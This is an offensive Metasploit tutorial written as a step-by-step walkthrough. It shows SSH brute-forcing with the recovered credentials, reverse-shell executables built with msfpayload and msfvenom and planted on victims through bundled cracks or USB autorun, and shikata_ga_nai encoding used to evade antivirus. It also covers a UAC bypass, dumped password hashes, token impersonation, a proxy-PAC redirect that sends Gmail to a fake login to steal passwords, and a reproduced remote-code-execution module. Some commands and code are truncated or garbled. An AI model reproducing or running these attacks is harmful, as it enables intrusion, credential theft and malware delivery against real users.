Advanced Pentesting Techniques With Metasploit

Contents Introduction ............................................................................................................................................................................... 3 1. AUXILIARY .............................................................................................................................................................................. 4 1.a Scanners ........................................................................................................................................................................... 4 1.b Fuzzers ............................................................................................................................................................................. 7 1.c Credential harvesting ..................................................................................................................................................... 11 2. POST EXPLOITATION ............................................................................................................................................................ 14 2.a privilege escalation ........................................................................................................................................................ 14 2.b IE proxy PAC ................................................................................................................................................................... 26 3. MISCELLANEOUS .................................................................................................................................................................. 34 3.a NOP generator ............................................................................................................................................................... 34 3.b encoders ........................................................................................................................................................................ 37 4. Advanced module/payload configuration options .............................................................................................................. 40 5. Writing custom Metasploit modules. .................................................................................................................................. 43 6. Stealthy techniques when using Metasploit. ....................................................................................................................... 48

Advanced Metasploit

3

Introduction Metasploit is an open source application for security that was created by HD in 2003. Many exploits are contained in Metasploit, because Metasploit has a framework, which allows any user access to any modules desired. Metasploit has the architecture shown below:

F IGURE 1: METASPLOIT ARCHITECTURE At this time, I will explain how to use Metasploit to take over a computer by scanning SSH and then performing BRUTEFORCE to find the username and password. I will also show how to perform FUZZING. Here I will also explain how one can use ENCODER techniques to create a Trojan that is undetected by antivirus. I will also explain how a person can use fake login techniques for credential harvesting. In addition, I will show how, when you have entered the target computer, you can manipulate several processes with stealthy techniques when using Metasploit, taking the user token on the target computer, changing the username and password, etc., and injecting it with techniques of privilege escalation. Finally, I will I explain how to create a custom module on Metasploit and use NOP sled to make your exploits stable, and how someone using PROXYPAC can steal your bank account.

Advanced Metasploit

4

1. AUXILIARY AUXILIARY is a collection of modules that do not use a payload. Functions of the auxiliary modules include port scanning, fingerprinting, service scanners, etc. Auxiliary modules also include several different types of protocols, such as scanners, network protocol fuzzers, wireless, and denial of service.

1.a Scanners This module, contained in auxiliary, scans to find the information on targets ranging from open ports to even identifying the OS in use by the target. See the illustrations below:

F IGURE 2: SSH BRUTEFORCE The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors. This module has several features to scan applications such as DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, NetBIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMWare, and VNC. For this article, I’m scanning SSH, using the auxiliary SSH module to scan and using brute force for the username and password. To get started, type msfconsole on the terminal. root@sungai:~# msfconsole

F IGURE 3: S TARTING METASPLOIT

Advanced Metasploit

5

After Metasploit loads, I use the module ssh_login with the following command: msf > use auxiliary/scanner/ssh/ssh_login Then I set the target to be scanned with the command: msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132 RHOSTS => 192.168.109.132

F IGURE 4: SETTING IP TARGET After I use the ssh_login module, I must have a dictionary to brute-force the SSH login. To perform user configuration and pass list using the existing dictionary, I use the following command: msf auxiliary(ssh_login) > show options

F IGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY I then use USERPASS_FILE options for setting the dictionary list: msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/Metasploitframework/data/wordlists/root_userpass.txt

Advanced Metasploit

6

F IGURE 6: SETTING USERPASS_FILE After setting wordlists to be used for brute force, I run that module with this command: msf auxiliary(ssh_login) > run Note: The more userpass wordlists are used, the longer the process. Results of the scanning SSH will look more or less like the following image.

F IGURE 7: S TARTING BRUTE FORCE SSH You can see that the results are as shown below: [*] 192.168.109.1:22 SSH - Starting brute force [*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22) at 2015-08-30 03:24:14 -0400 [+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com' 'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 x86_64 x86_64 GNU/Linux ' IP Target 192.168.109.1, Port 22, has a user access name “cupenkz” with password ”it-trad.com.” After getting the target, the following command can be used to do the checking: msf auxiliary(ssh_login) > sessions -i

Note: -i is the command for interacting with ID number Active sessions =============== Id Type

Information

Connection

-- ----

-----------

----------

Advanced Metasploit

7

2 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1) 3 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)

F IGURE 8: RESULT OF SSH BRUTEFORCE After the session begins, you can directly interact with the target using the command: msf auxiliary(ssh_login) > sessions -i 2 Note: -i is the command for interact with ID number The purpose of the command is to run session number 2.

F IGURE 9: RUNNING SESSION 2 After you get shell on the target, you only have access as a user, but you could gain root access if you know the vulnerability in the OS.

1.b Fuzzers Fuzzing is a technique in which an attacker exploits the weaknesses of an application that is used by the target. Usually these weaknesses could cause the target to crash, which can even provide access into the target terminal. In Metasploit,

Advanced Metasploit

8

there are several modules that can be used for such an application, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS. However, not all versions of these applications be attacked using a fuzzer module contained in Metasploit. This technique is illustrated below:

F IGURE 10: I LLUSTRATION OF FUZZING SSH The illustration shows that, if a company has Wi-Fi access, it can be accessed by others and abused. Attackers can scan the company’s computers. In addition, if the company has a vulnerability in its SSH application, SSH on its computers can be targeted to cause a crash. To start fuzzing, you must run Metasploit first with the command: root@sungai:~# msfconsole

F IGURE 11: RUNNING METASPLOIT After Metasploit runs, use the command below to run the SSH fuzzer. msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt msf auxiliary(ssh_version_corrupt) > However, before using the ssh fuzzer module, maybe we should scan the target first, using the nmap simply to ascertain whether the target is using SSH or not. I use the command: root@sungai:~# nmap -sS -v -A 192.168.109.1 Note: -sS is the command for scanning the TCP SYN packet

Advanced Metasploit

9

-v is the command for verbose (resulting in detailed scanning) -A is the command for detecting the OS used, version, script scanning, and traceroute Results of the scan are shown below:

F IGURE 12: HASIL SCANNING NMAP You can see from the picture that the IP 192.168.109.1 is using OpenSSH, version 6.6.1, with port 22 open. After viewing the information that is used by the SSH module fuzzer, you can use the command: msf auxiliary(ssh_version_corrupt) > info The following information can be seen: MAXDEPTH specifications for testing on the target byte RHOST is an IP target RPORT is a port target. Before running the SSH module fuzzer, I have to apply the settings for the MAXDEPT and RHOST as follows:

Advanced Metasploit

10

F IGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER The picture above shows the settings for the specification of bytes sent, the target IP, and the target port. To perform settings, use the command: msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999 maxdepth => 999999999999 msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1 rhost => 192.168.109.1 After the settings are correct, you can run with this command: msf auxiliary(ssh_version_corrupt) > run

F IGURE 14: SSH FUZZER RUNNING

Advanced Metasploit

11

The picture above shows Metasploit using fuzzing against the target, but not all versions of SSH have this vulnerability. So, if SSH in the target does not crash, there is the possibility that SSH is already in the patch.

1.c Credential harvesting Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and others. This technique has many variations through which an attacker can create a payload to get a username/password login and other information. An illustration of credential harvesting is shown below.

F IGURE 15: CREDENTIAL HARVESTING The image above shows that the attacker can retrieve user and password targets using AutoLogin if the target has AutoLogin settings. First, we must have access to a computer target for use in the credential harvesting technique. I gain access using Meterpreter, as shown below:

F IGURE 16: METERPRETER C ONNECTED After connecting with Meterpreter, I run Meterpreter as a background service. Then I search the credential module using the following command: msf exploit(handler)> search credential

F IGURE 17: SEARCHING CREDENTIAL MODULE In Metasploit, there are many module credentials, but I use the module post/windows/gather/credentials/windows_autologin. To access this module, I use the following command: msf exploit(handler)> use post/windows/gather/credentials/windows_autologin

Advanced Metasploit

12

F IGURE 18: USING MODULE POST/WINDOWS /GATHER / CREDENTIALS /WINDOWS _AUTOLOGIN

After that, I can see more options in this module with the command: msf post(windows_autologin)> show options

F IGURE 19: S HOWING OPTION MODULE WINDOWS _AUTOLOGIN

The above picture shows an option contained in the module. Here I am just setting part of the session, which is used with the command: msf post(windows_autologin)>sessions -i

F IGURE 20: SEEING SESSION ACTIVE IN TARGET msf post(windows_autologin)> set sessions 1

F IGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN After setting the module, I run this module with the command:

Advanced Metasploit

13

msf post(windows_autologin)> exploit

F IGURE 22: E XPLOIT RUNNING The illustration shows how the exploit reveals the password and username information contained on the target computer: user: cupenkz password [No Password!] Domain: FATBOYGAG-SLIM When the target computer does not have a set auto login, the exploit does not work and shows something like the image below:

F IGURE 23: E XPLOIT NOT WORKING

Advanced Metasploit

14

2. POST EXPLOITATION Another technique that the attacker can use to gain further access to the target's internal network is packet sniffing. An attacker can also put a backdoor to retain access to the target.

2.a privilege escalation This technique allows an attacker to take over the target computer by taking advantage of an exposed vulnerability. Once the computer is taken over, the attacker tries to raise user access, as in the following illustration:

F IGURE 24: PRIVILEGE ESCALATION In this example, my target is Windows 7 Ultimate 32 bit. To do the scanning to find the OS used, I use the command: root@sunga : nmap –sS –v –A 192.168.130.1

F IGURE 25: SCANNING USE NMAP Note: -sS is the command for scanning by using the TCP SYN packet -v is the command for verbose (resulting in detail scanning) -A is the command for detecting the OS used, version, script scanning, and traceroute The results are as shown below.

Advanced Metasploit

15

F IGURE 26: T HE RESULT FROM SCANNING USE NMAP To perform privilege escalation, I first made the application form execute the payload; then the target will be connected with a computer attacker. I use msfpayload with the command: sungati@root : msfpayload windows/Meterpreter/reverse_tcp LHOST=192.168.130.128 LPORT=4444 x > /var/www/cupenkz.exe

F IGURE 27: L OADING MSFPAYLOAD TO MAKE A MALICIOUS FILE

Note: - Msfpayload command creates a payload using reverse_tcp - LHOST is an IP attacker - LPORT is a computer port attacker - X command creates an exe file named cupenkz.exe After making the application payload, you need to trick the unsuspecting targets in order to use the payload silently, such as by combining it with a program like crack or install autoscript usb, which is useful when installed in the target computer; then the application will run. In this case, I just give an example of how best to move so that the application is executed with the target. After that, I run the exploit handler on a computer attacker, with the command:

F IGURE 28: USING EXPLOIT/MULTI/ HANDLER IN COMPUTER ATTACKER

Advanced Metasploit

16

The function of the above command is that, when cupenkz.exe is executed with a target computer, the attacker computer is ready to receive the payload and open a reverse connection from the target computer.

F IGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ .EXE After setting the LHOST attacker on the computer, I run the command: msf exploit(handler) > run Then, when one of the files that we uploaded earlier (cupenkz.exe) is executed by the target, it will look like the image above. The above-owned user access is usually limited to the user, not the administrator or root.

F IGURE 30: A CCESS IS DENIED I tried to do getsystem when it was targeted with the command: Meterpreter > getsystem

F IGURE 31: GETSYSTEM FAIL The above condition is that we have only limited access to user, and cannot access to the system; I view it with the command: Meterpreter > getuid

Advanced Metasploit

17

F IGURE 32: T HE POSITION OF THE CURRENT USER After that, I review the information contained in getsystem with the command: Meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h

Help Banner.

-t The technique to use. (Default to ”0”). 0. All techniques available 1. Service - Named Pipe Impersonation (In Memory/Admin) 2. Service - Named Pipe Impersonation (Dropper/Admin) 3. Service - Token Duplication (In Memory/Admin) There are three functions that are used to increase user access to a target computer, among others. The first function is 1. Service - Named Pipe Impersonation (In Memory/Admin), where the attacker does the exploit on the target computer, usually as a local exploit. Local exploits are used to take over the target computer in full. I first run Meterpreter as background, with the command:

F IGURE 33: RUNNING METERPRETER AS BACKGROUND msf exploit(handler) > search uac

Advanced Metasploit

18

F IGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC msf exploit(handler) > use/exploit/windows/local/bypassuac Above I’m searching a Windows 7 computer with the local exploit with the name bypass UAC, and then I set the session on a local exploit.

F IGURE 35: SETTING SESSION msf exploit(bypassuac) > set SESSION 2 After the setting session is complete, I run the exploit locally with the command: msf exploit(bypassuac) > exploit

Advanced Metasploit

19

F IGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL W INDOWS 7 Session 2 has been created by using local exploit bypassuac to replace the session with the command: msf exploit(bypassuac) > sessions -i msf exploit(bypassuac) > sessions –i 2

F IGURE 37: CHANGING SESSION msf exploit(bypassuac) > sessions -i 2 After running this, I will try to identify whether user access is no longer restricted.

F IGURE 38: A CCESS BY USING GETSYSTEM

The picture above shows where the system is created using a local exploit. Here I took over the account system; in other words, the root account. If you have the root account, then you can take over the entire contents of the target computer.

Advanced Metasploit

20

UAC (user account control) is a security feature in Windows. Each function that appears to be accessing files or applications on a Windows system will display a warning from UAC asking for confirmation as a security feature. This feature can be deactivated (disabled) so you are not disturbed by the frequent Windows question, "Do you want to allow the following program to install software on this computer?" UAC/user account control is a technology and security infrastructure introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it. Why do we need an exploit to bypass UAC? The exploit is a technique by which we can take over the targeted computer. There are two types of exploit attacks, namely remote and local. Usually a remote exploit is used when an application on the target has a vulnerability that can be accessed remotely (via the port connection). In this example, we use SSH, FTP, etc. A local exploit usually finds the cracks in the application contained on the targeted computer. See the illustration below.

F IGURE 39: REMOTE E XPLOIT The figure shows a remote exploit, with the attacker scanning SSH on the target and finding a SSH vulnerability. Then the attacker can attack using a remote SSH exploit.

F IGURE 40: L OCAL EXPLOIT The illustration shows the attacker performing remote ssh in the open and seeing that the target computer’s UAC feature can be bypassed, so the user privileges can be raised, and the attacker uses the local exploit bypassuac on the target computer. This shows the difference between a local exploit and a remote exploit. Bypass UAC is a technique that raises the standard user access rights to be an administrator without requiring authorization from the target. In this example, I used the payload bypassUAC on Metasploit. This technique will create an executable file and find the Windows directory to which to upload it. Then the file is injected and, if the file is executed, it will change the permissions of the user to be an administrator. An illustration can be seen in the figure below:

Advanced Metasploit

21

F IGURE 41: B YPASS UAC The illustration shows approximately how UAC is bypassed: 1. 2. 3. 4.

Meterpreter connect—attacker must have a connection to the target through Meterpreter. Upload malicious—attacker creates a malicious file using bypassuac, then uploads it to the target computer and puts it in a specific directory on system target. Execute file—attacker executes files that have been created earlier. Create session for Meterpreter—malicious file creates a session that is integrated through Meterpreter.

The second function is 2. Service - Named Pipe Impersonation (Dropper / Admin) While the above function is aimed at a file system on the target computer, here I use Windows API with railgun, which is one of the applications contained in Metasploit. Railgun is an application that can interact and gain full access using Windows API. For information contained in the Windows API documentation on the website, you can look at msdn.microsoft.com, because I am not going to explain much here about the API function in Windows. Here I use an IRB shell to run railgun, with the command: Meterpreter > irb [*] Starting IRB shell [*] The 'client' variable holds the Meterpreter client After that, I see what DLLs are used in this module that already exist in railgun, with the command: >> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"] >>

F IGURE 42: DLLS USED IN RAILGUN The above are the default 12 DLLs that can be used in railgun; here I use netapi32 to change user admin on the target computer. First, I must check what user is already present on the target with the command: Meterpreter > hashdump admin:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::

Advanced Metasploit

22

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cupenkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9::: fatboygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: UpdatusUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

F IGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB 51400 C 232862211 DB 317 DA0793 BC 9 The above shows six users who are on the target computer; now I'll try change the password cupenkz using the following command: >> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz", "cupenkz123") Note: - client.railgun.netapi32.NetUserChangePassword list_tokens -u Delegation Tokens Available ======================================== fatboygag-slim\fatboygagslim NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== fatboygag-slim\UpdatusUser NT AUTHORITY\ANONYMOUS LOGON

Advanced Metasploit

25

F IGURE 47: LISTING TOKENS USED IN TARGET Note: -u command for see list token There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but it is not permanent, unlike the IMPERSONATION token. After that, I would choose the token using the command: Meterpreter > impersonate_token Usage: impersonate_token Instructs the Meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token. Hint: Double backslash DOMAIN\\name (Meterpreter quirk) Hint: Enclose with quotation marks if name contains a space Meterpreter >

F IGURE 48: IMPERSONATE _TOKEN Here I will try to use the user token "fatboygag-slim fatboygagslim \\", with the command Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim [+] Delegation token available

Advanced Metasploit

26

[+] Successfully impersonated user fatboygag-slim\fatboygagslim

F IGURE 49: IMPERSONATE _TOKEN SUCCESSFULLY

To check whether the token has been successfully used, I use the command: Meterpreter > getuid Server username: fatboygag-slim\fatboygagslim

F IGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY From the above explanation, we see that, when we are connected to the target, then we can use the existing user token on the computer by using incognito.

2.b IE proxy PAC This is a technique in which the attacker can insert a fake login on a website by performing exploitation on IE so that, when the target is open on the web, the password will be captured by the attacker, as shown below.

F IGURE 51: IE PROXY PAC To run this technique, you should already have access to the target computer. Here, I use Meterpreter on the target using the exploit me08_067_netapi, as shown in the following illustration:

Advanced Metasploit

27

F IGURE 52: METERPRETER USING EXPLOIT ME 08_067_NETAPI After I have opened the target with Meterpreter, I look for the ie_proxypac exploit with this command: msf exploit(ms08_06_netapi) > search ie_proxy

F IGURE 53: SEARCHING IE _PROXY MODULE After searching, there is one module for ie_proxy, and then I use the command: msf exploit(ms08_06_netapi) > use post/windows/manage/ie_proxypac

Advanced Metasploit

28

F IGURE 54: INFO MODULE IE _PROXYPAC The picture above shows a brief description of the module ie_proxypac. To run the module, I see the first option is to look at at the previous settings. I use the command: msf post(ie_proxy) > show options

F IGURE 55: OPTION MODULE IE _ PROXYPAC In the module above, there are five options that must be set, but for AUTO DETECT and DISABLE PROXY I’m using the default. For the REMOTE_PAC, the setting will load a .pac file on remote, and LOCAL_PAC is a setting where there is a .pac file on the computer attacker, which is a previously made .pac file on the local computer. I put the path /var/www/cupenkz.pac .pac file to fill the .pac file, as shown below:

Advanced Metasploit

29

F IGURE 56: CONTENT FILE CUPENKZ .PAC The picture above shows a .pac file that will open www.gmail.com and the target computer will be redirected to the IP 192.168.109.130. The IP is already in post fake login. After that, I did the setting for LOCAL_PAC with the command: msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac

F IGURE 57: SETTING LOCAL_PAC After setting the file .pac , I set a SESSION number on which to run the file. However, before that I check that SESSION is at the target using the command. msf post(ie_proxy) > sessions -i Note: -i is the command for interact with ID number

Advanced Metasploit

30

F IGURE 58: CHECKING A CTIVE SESSION A session can be active only once; after that, do the settings with the command: msf post(ie_proxy) > set SESSIONS 1 Note: -i is the command for interacting with the ID number

F IGURE 59: SETTING SESSION U SE NO 1 After all the settings are done, then run the command: msf post(ie_proxy) > exploit

F IGURE 60: RUNNING IE _PROXYPAC The picture above shows the information that the .pac file from the local computer will upload to the target computer with the following command: C:\Documents and settings\NetworkService\Application Data\hFTVnk.pac

Advanced Metasploit

31

To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, chose menu Internet Options, and select the option as shown below.

F IGURE 61: INTERNET OPTION IE After that, I choose Connection and LAN setting

The result obtained can be seen in the following settings.

Advanced Metasploit

32

F IGURE 62: SETTING IE INTERNET OPTION The picture above shows setting the proxypac on IE, where the file hFTVnk.pac is configured as the IE proxy pac. To verify whether the file proxy is mounted, run IE and open www.gmail.com, as shown below:

F IGURE 63: D ISPLAYING IE ON TARGET WHEN IT OPENS WWW .GMAIL. COM

Advanced Metasploit

33

To better ascertain whether hF Vnk.pac is loaded or not, I use View Source and look for the link authentication used, as shown below:

F IGURE 64: VIEWING S OURCE PROXYPAC As can be seen, www.gmail.com is the link that is opened in IE, because the attached file authentication cupenkz.html, if there is a login it, will immediately redirect to www.mail.google.com. The advantage of using this technique is the URL address to the web browser is almost similar to the original, so it is less likely to be suspected.

Advanced Metasploit

34

3. MISCELLANEOUS A function of this technique is bypassing security contained in the target. As a small example, it can bypass antivirus and IDS (instruction detecting system).

3.a NOP generator NOP (no operation) is a technique by which NOP commands are used to add some bytes to the exploit payload. The function of adding bytes is to solve the problem of finding the original EIP address of a buffer, effectively increasing the target area. As an example from everyday life is a glass that can be filled with 500ml of water. If we fill it with 501ml water, the water will be spilled out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of data is filled with 501 bytes, causing it to crash. Think of it this way: After the fuzzing finds that the EIP application lies in 510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs. For an illustration of how NOP works, see the diagram below:

F IGURE 65: NOP WORKING The above illustration shows how NOP works: NOP makes a jump to the next address so that the end of the NOP command calls the shellcode. For using the NOP Generator, you must already know the NOP module contained in Metasploit. root@sungai:~# msfconsole

Advanced Metasploit

35

F IGURE 66: S TART METASPLOIT Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command: msf > use payload/windows/shell_bind_tcp

F IGURE 67: USE SHELL _BIND _TCP PAYLOAD

As can be seen from the picture above, shell_bind_tcp can make a connection back from the target when the target executes the payload, and then the target will be connected to the computer attacker using attacker port 4444. To execute the payload, use the command below: msf payload (shell_bind_tcp) > generate

Advanced Metasploit

36

F IGURE 68: GENERATE PAYLOAD It can be seen from the results that the payload generated little endian or so-called shellcode that totals 341 bytes. Here is a NOP function can add value to the shellcode. To try it out, can use the command. msf payload (shell_bind_tcp) > generate -s 14 Note: -s is the command to add how many bytes on NOP

Advanced Metasploit

37

F IGURE 69: GENERATE USE -S NOP SLED The shellcode, as can be seen from the above, now contains 355 bytes. The “-s command 14” adds a NOP sled of 14 bytes to the shellcode. The function of the NOP sled is the same thing that I illustrated by the water in a glass. If the shellcode does not crash the application being fuzzed, the NOP sled is one way in which values can be added to exploit the shellcode running.

3.b encoders This is a technique that is used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan and is not detected by anti-virus software. At this time, I will make a payload.exe using msfvenom with the command: root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp LHOST=192.168.109.130 LPORT=6969 -x -f exe > /root/Desktop/cupu.exe Note: -p is the command to choose the payload used -x is the command to specify a custom executable file to use as a template -f is the command for an output format file to be produced

F IGURE 70: CREATE FILE CUPU .EXE You can see in the picture above that msfvenom makes a file with the name “cupu.exe” by using the payload windows/Meterpreter/reverse_tcp and, if this file is executed in the target, the target will be connected to the attacker's IP 192.168.109.130 using Port 6969.

Advanced Metasploit

38

Here I will check the cupu.exe file by using www.virustotal.com:

F IGURE 71: RESULT SCANNING CUPU .EXE The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. However, here I am trying to encode the cupu.exe file to cupenkz.exe to be undetected by AV software. Use the command: root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp LHOST=192.168.109.130 LPORT=6969 -x -f exe -e x86_shikata_ga_nai> /root/Desktop/cupenkz.exe Note: -p is the command for choosing what payload is used -x is the command for specifying a custom executable file to use as a template -f is the command for output format file, yang akan di hasilkan -e is the command for choosing the encryption you want to be used

To the above command, I add the encode options -e x86_shikata_ga_nai, and the results of the cupenkz.exe file on scanning www.virustotal.com, as shown below.

Advanced Metasploit

39

F IGURE 72: RESULT S CANNING FILE CUPENKZ .EXE AT VIRUSTOTAL . COM

The picture above shows that the cupenkz.exe file as completely undetectable by antivirus software, using shikata_ga_nai encoding.

Advanced Metasploit

40

4. Advanced module/payload configuration options These are techniques whereby, when we're loading a module, we can set parameters in advance, by which I mean that it can automatically make an order in the attack. For example, use this command: msf auxiliary (ssh_login) > show advanced

F IGURE 73: SETTING SHOW ADVANCED MODULE SSH _ LOGIN The above is an advanced setting for auxiliary ssh_login scanners; it can be seen that there are some settings and also a description. To change the settings, use the command: msf auxiliary (ssh_login) > set Name CurrentSetting example: msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config

F IGURE 74: CHANGE SETTING AN AUTORUNSCRIPT enum_conf command is to take some of the configuration information contained on target; to check whether the setting has been changed or not , use a command like this: msf auxiliary (ssh_login) > show advanced

Advanced Metasploit

41

F IGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED You can see in the picture above that the setting for AutoRunScript has turned into post/linux/gather/enum_config. This affects the actual setting when you want to attack with their own methods, because usually this method depends on the situation and conditions in the field. AutoRunScript can be seen from the results of the run, as shown below:

F IGURE 76: RESULT FROM AUTORUNSCRIPT

The picture above shows that the OS used by the target is Fedora 21 and there is some log information that has been stored on the computer attacker. By using AutoRunScript, you can make an attack and obtain the information contained in the target. Examples of the information obtained are shown below.

Advanced Metasploit

42

F IGURE 77: RESULT LOG FROM AUTORUNSCRIPT

The picture above shows the results log on Samba configuration, and shows where the log files are stored by the computer attacker.

Advanced Metasploit

43

5. Writing custom Metasploit modules. Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to make the module, you should understand the programming language Ruby. Here I have an example exploit that I took from exploit-db.com:

F IGURE 78: E XPLOIT FROM EXPLOIT - DB .COM The source above is made by w3tw0rk, who made an exploit by utilizing the vulnerability of applications Pitbul IRC Bot. Here's the source: _________________________________________________snip_______________________________________________ ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name'

=> 'w3tw0rk / Pitbul IRC Bot

'Description'

=> %q{

Remote Code Execution',

This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. }, 'Author'

=>

[ 'Jay Turla' ], 'License'

=> MSF_LICENSE,

'References'

=>

[ [ 'OSVDB', '120384' ], [ 'EDB', '36652' ] ], 'Platform'

=> %w{ unix win },

Advanced Metasploit

44

'Arch'

=> ARCH_CMD,

'Payload'

=>

{ 'Space' including the cr-lf

=> 300, # According to RFC 2812, the max length message is 512,

'DisableNops' => true, 'Compat'

=>

{ 'PayloadType' => 'cmd' } }, 'Targets'

=>

[ [ 'w3tw0rk', { } ] ], 'Privileged'

=> false,

'DisclosureDate' => 'Jun 04 2015', 'DefaultTarget'

=> 0))

register_options( [ Opt::RPORT(6667), OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) ], self.class) end def check connect res = register(sock) if res =~ /463/ || res =~ /464/ vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end res = join(sock) if !res =~ /353/ && !res =~ /366/ vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")

Advanced Metasploit return Exploit::CheckCode::Unknown end quit(sock) disconnect if res =~ /auth/ && res =~ /logged in/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while !read_data.nil? data e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? msg 9 nick = rand_text_alpha(9) print_error("The nick is longer than 9 characters, using #{nick}") else nick = datastore['NICK'] end msg use exploit/cupenkz

F IGURE 82: USE EXPLOIT CUPENKZ It can be seen, after you import the module itself, that indirectly you've made a custom module to be added to Metasploit.

Advanced Metasploit

48

6. Stealthy techniques when using Metasploit. Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been acquired can be entered at any time; the attacker can then perform scanning and other techniques in many circumstances where it seems unimaginable. In this example, the target has IDS/IPS, which is very paranoid, so that when it is done, the IDS/IPS instantly displays a warning and alerts the attacker. The target also has AV/antirootkit so, when installing a backdoor, it will be known by admin. This time I pointed out that the attacker is scanning the target and is not suspicious. However, not all administrators can bypass, because setting a system depends on whether or not it is paranoid about that setting. First of all, I run Metasploit with the command: root@sungai:~# msfconsole

F IGURE 83: S TART METASPLOIT Then use the module auxiliary/scanner/Portscan/syn: msf> use auxiliary/scanner/portscan/syn

Advanced Metasploit

49

F IGURE 84: USING AUXILIARY /SCANNER /PORTSCAN/SYN The module option can be seen above; it appears that the attacker can adjust the settings for how many ports will be scanned and how much timeout is used. It is as if you are knocking on a door: If you knock on the door as much as 100 times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send multiple packets as much as 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up to do the scanning of ports 20-30 only, and setting timeout to 200. Use the command msf auxiliary (syn)> set ports 20-30 msf auxiliary (syn)> set timeout 200

F IGURE 85: SETTING PORT AND TIMEOUT After setting port and timeout, you must set the IP target, with the command: msf auxiliary (syn)> set rhosts 192.168.109.1

F IGURE 86: SETTING IP TARGET Then you can run with the command: msf auxiliary (syn)> run

F IGURE 87: RUNNING SYN SCAN 7 From the picture above, we see that the target has port 22 open. The result of port scanning is short because I did not use random port scanning and tried to do stealthy scanning

Advanced Metasploit

50

